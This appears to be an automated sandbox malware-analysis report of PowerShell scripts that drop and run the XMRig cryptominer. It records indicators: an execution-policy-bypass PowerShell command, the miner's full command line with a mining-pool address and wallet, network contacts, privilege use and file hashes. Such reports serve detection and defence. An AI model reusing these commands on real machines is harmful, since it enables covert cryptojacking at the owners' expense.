memory/4920-67-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-68-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-69-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-70-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-71-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-72-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-73-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-74-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-75-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-76-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-77-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-78-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-79-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-80-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-81-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-82-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-83-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-84-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-85-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-86-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-87-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-88-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-89-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-90-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-91-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-92-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-93-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-94-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-95-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-96-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-97-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-98-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-99-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-100-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-101-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-102-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-103-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-104-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-105-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-106-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-107-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-108-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-109-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-110-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-111-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-112-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-113-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-114-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-115-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-116-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-117-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-118-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:04

Platform

win10v2004-20240508-en

Max time kernel

1794s

Max time network

1807s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4368,i,3724086843943218842,1026644135694712596,262144 --variations-seed-version --mojo-platform-channel-handle=1416 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4040,i,3724086843943218842,1026644135694712596,262144 --variations-seed-version --mojo-platform-channel-handle=3740 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 50.192.11.51.in-addr.arpa udp

Files

memory/2808-0-0x00007FFF759E3000-0x00007FFF759E5000-memory.dmp

memory/2808-1-0x0000016A2C370000-0x0000016A2C392000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jwuyalkd.h3o.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2808-11-0x00007FFF759E0000-0x00007FFF764A1000-memory.dmp

memory/2808-12-0x00007FFF759E0000-0x00007FFF764A1000-memory.dmp

memory/2808-14-0x00007FFF759E0000-0x00007FFF764A1000-memory.dmp

memory/2808-16-0x0000016A2E6A0000-0x0000016A2E6AA000-memory.dmp

memory/2808-15-0x0000016A2EA00000-0x0000016A2EA12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/536-47-0x000001CC64C80000-0x000001CC64CA0000-memory.dmp

memory/536-48-0x000001CC663F0000-0x000001CC66410000-memory.dmp

memory/536-49-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/2808-50-0x00007FFF759E3000-0x00007FFF759E5000-memory.dmp

memory/2808-51-0x00007FFF759E0000-0x00007FFF764A1000-memory.dmp

memory/536-53-0x000001CC66430000-0x000001CC66450000-memory.dmp

memory/536-52-0x000001CC66410000-0x000001CC66430000-memory.dmp

memory/536-54-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/2808-55-0x00007FFF759E0000-0x00007FFF764A1000-memory.dmp

memory/536-56-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-58-0x000001CC66410000-0x000001CC66430000-memory.dmp

memory/536-57-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-59-0x000001CC66430000-0x000001CC66450000-memory.dmp

memory/536-60-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-61-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-62-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-63-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-64-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-65-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-66-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-67-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-68-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-69-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-70-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-71-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-72-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-73-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-74-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-75-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-76-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-77-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-78-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-79-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-80-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-81-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-82-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-83-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-84-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-85-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-86-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-87-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-88-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-89-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-90-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-91-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-92-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-93-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-94-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-95-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-96-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-97-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-98-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-99-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-100-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-101-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-102-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-103-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-104-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-105-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-106-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-107-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-108-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-109-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-110-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-111-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-112-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-113-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-114-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-115-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-116-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-117-0x00007FF690650000-0x00007FF691283000-memory.dmp

memory/536-118-0x00007FF690650000-0x00007FF691283000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:07

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 216.131.50.23.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/2860-0-0x00007FF9181B3000-0x00007FF9181B5000-memory.dmp

memory/2860-1-0x0000019A7E8D0000-0x0000019A7E8F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rtn2ipjd.rvr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2860-11-0x00007FF9181B0000-0x00007FF918C71000-memory.dmp

memory/2860-12-0x00007FF9181B0000-0x00007FF918C71000-memory.dmp

memory/2860-14-0x00007FF9181B0000-0x00007FF918C71000-memory.dmp

memory/2860-15-0x0000019A7F270000-0x0000019A7F282000-memory.dmp

memory/2860-16-0x0000019A7F040000-0x0000019A7F04A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3996-47-0x0000019D19B10000-0x0000019D19B30000-memory.dmp

memory/3996-48-0x0000019D19B60000-0x0000019D19B80000-memory.dmp

memory/3996-49-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/2860-51-0x00007FF9181B0000-0x00007FF918C71000-memory.dmp

memory/2860-50-0x00007FF9181B3000-0x00007FF9181B5000-memory.dmp

memory/3996-52-0x0000019D19B80000-0x0000019D19BA0000-memory.dmp

memory/3996-53-0x0000019D19BA0000-0x0000019D19BC0000-memory.dmp

memory/3996-54-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/2860-55-0x00007FF9181B0000-0x00007FF918C71000-memory.dmp

memory/3996-56-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-58-0x0000019D19B80000-0x0000019D19BA0000-memory.dmp

memory/3996-57-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-59-0x0000019D19BA0000-0x0000019D19BC0000-memory.dmp

memory/3996-60-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-61-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-62-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-63-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-64-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-65-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-66-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-67-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-68-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-69-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-70-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-71-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-72-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-73-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-74-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-75-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-76-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-77-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-78-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-79-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-80-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-81-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-82-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-83-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-84-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-85-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-86-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-87-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-88-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-89-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-90-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-91-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-92-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-93-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-94-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-95-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-96-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-97-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-98-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-99-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-100-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-101-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-102-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-103-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-104-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-105-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-106-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-107-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-108-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-109-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-110-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-111-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-112-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-113-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-114-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-115-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-116-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-117-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-118-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:07

Platform

win11-20240508-en

Max time kernel

1799s

Max time network

1765s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
